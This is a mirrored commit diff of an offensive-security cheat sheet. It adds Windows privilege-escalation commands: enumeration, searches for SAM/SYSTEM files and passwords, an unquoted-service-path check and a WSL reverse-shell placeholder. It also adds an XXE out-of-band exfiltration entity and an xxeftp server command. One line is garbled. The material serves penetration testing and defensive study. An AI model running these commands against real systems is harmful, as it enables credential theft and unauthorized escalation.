mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Windows Priv Esc - Unquoted Path, Password looting and Powershell version
This commit is contained in:
parent
cdc3b5e080
commit
38c3bfbd9f
2 changed files with 102 additions and 4 deletions
|
@ -4,6 +4,7 @@
|
|||
|
||||
```powershell
|
||||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||
wmic qfe
|
||||
```
|
||||
|
||||
Architecture
|
||||
|
@ -16,12 +17,15 @@ List all env variables
|
|||
|
||||
```powershell
|
||||
set
|
||||
Get-ChildItem Env: | ft Key,Value
|
||||
```
|
||||
|
||||
List all drives
|
||||
|
||||
```powershell
|
||||
wmic logicaldisk get caption || fsutil fsinfo drives
|
||||
wmic logicaldisk get caption,description,providername
|
||||
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
|
||||
```
|
||||
|
||||
## User Enumeration
|
||||
|
@ -30,18 +34,28 @@ Get current username
|
|||
|
||||
```powershell
|
||||
echo %USERNAME% || whoami
|
||||
$env:username
|
||||
```
|
||||
|
||||
List user privilege
|
||||
|
||||
```powershell
|
||||
whoami /priv
|
||||
```
|
||||
|
||||
List all users
|
||||
|
||||
```powershell
|
||||
net user
|
||||
net users
|
||||
whoami /all
|
||||
Get-LocalUser | ft Name,Enabled,LastLogon
|
||||
Get-ChildItem C:\Users -Force | select Name
|
||||
```
|
||||
|
||||
List logon requirements; useable for bruteforcing
|
||||
|
||||
```powershell
|
||||
```powershell$env:usernadsc
|
||||
net accounts
|
||||
```
|
||||
|
||||
|
@ -57,32 +71,39 @@ List all local groups
|
|||
|
||||
```powershell
|
||||
net localgroup
|
||||
Get-LocalGroup | ft Name
|
||||
```
|
||||
|
||||
Get details about a group (i.e. administrators)
|
||||
|
||||
```powershell
|
||||
net localgroup administrators
|
||||
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
||||
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
|
||||
```
|
||||
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces
|
||||
List all network interfaces, IP, and DNS.
|
||||
|
||||
```powershell
|
||||
ipconfig /all
|
||||
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
|
||||
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
|
||||
```
|
||||
|
||||
List current routing table
|
||||
|
||||
```powershell
|
||||
route print
|
||||
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
|
||||
```
|
||||
|
||||
List the ARP table
|
||||
|
||||
```powershell
|
||||
arp -A
|
||||
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
|
||||
```
|
||||
|
||||
List all current connections
|
||||
|
@ -103,12 +124,31 @@ List all network shares
|
|||
net share
|
||||
```
|
||||
|
||||
SNMP Configuration
|
||||
|
||||
```powershell
|
||||
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
```
|
||||
|
||||
## Looting for passwords
|
||||
|
||||
### SAM and SYSTEM files
|
||||
|
||||
```powershell
|
||||
%SYSTEMROOT%\repair\SAM
|
||||
%SYSTEMROOT%\System32\config\RegBack\SAM
|
||||
%SYSTEMROOT%\System32\config\SAM
|
||||
%SYSTEMROOT%\repair\system
|
||||
%SYSTEMROOT%\System32\config\SYSTEM
|
||||
%SYSTEMROOT%\System32\config\RegBack\system
|
||||
```
|
||||
|
||||
### Search for file contents**
|
||||
|
||||
```powershell
|
||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||
findstr /si password *.xml *.ini *.txt *.config
|
||||
```
|
||||
|
||||
### Search for a file with a certain filename
|
||||
|
@ -165,12 +205,22 @@ Example content
|
|||
|
||||
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
|
||||
|
||||
## Processes Enumeration
|
||||
### IIS Web config
|
||||
|
||||
```powershell
|
||||
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
|
||||
```
|
||||
|
||||
## Processes Enumeration and Tasks
|
||||
|
||||
What processes are running?
|
||||
|
||||
```powershell
|
||||
tasklist /v
|
||||
net start
|
||||
sc query
|
||||
Get-Service
|
||||
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
|
||||
```
|
||||
|
||||
Which processes are running as "system"
|
||||
|
@ -185,6 +235,32 @@ Do you have powershell magic?
|
|||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||
```
|
||||
|
||||
List installed programs
|
||||
|
||||
```powershell
|
||||
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
|
||||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||||
```
|
||||
|
||||
Scheduled tasks
|
||||
|
||||
```powershell
|
||||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
```
|
||||
|
||||
Startup tasks
|
||||
|
||||
```powershell
|
||||
wmic startup get caption,command
|
||||
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
||||
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
||||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||||
```
|
||||
|
||||
|
||||
## Using PowerSploit's PowerUp
|
||||
|
||||
Spot the weak service using PowerSploit's PowerUp
|
||||
|
@ -206,6 +282,18 @@ wsl whoami
|
|||
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
||||
```
|
||||
|
||||
## Unquoted Service Paths
|
||||
|
||||
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
|
||||
|
||||
```powershell
|
||||
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
|
||||
|
||||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||||
```
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
|
@ -213,4 +301,5 @@ wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
|||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
||||
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
||||
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
||||
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
|
|
@ -10,6 +10,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||
|
||||
## Summary
|
||||
|
||||
- [Tools](#tools)
|
||||
- [Exploit](#exploit)
|
||||
- [Basic XXE](#basic-xxe)
|
||||
- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
|
||||
|
@ -17,6 +18,13 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||
- [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
|
||||
- [XXE in exotic files](#xxe-in-exotic-files)
|
||||
|
||||
## Tools
|
||||
|
||||
- [xxeftp](https://github.com/staaldraad/xxeserv)
|
||||
```
|
||||
sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
|
||||
```
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
|
||||
|
@ -184,6 +192,7 @@ File stored on http://127.0.0.1/dtd.xml
|
|||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
||||
```
|
||||
|
||||
|
||||
## XXE in exotic files
|
||||
|
||||
### XXE inside SOAP
|
||||
|
|
Loading…
Reference in a new issue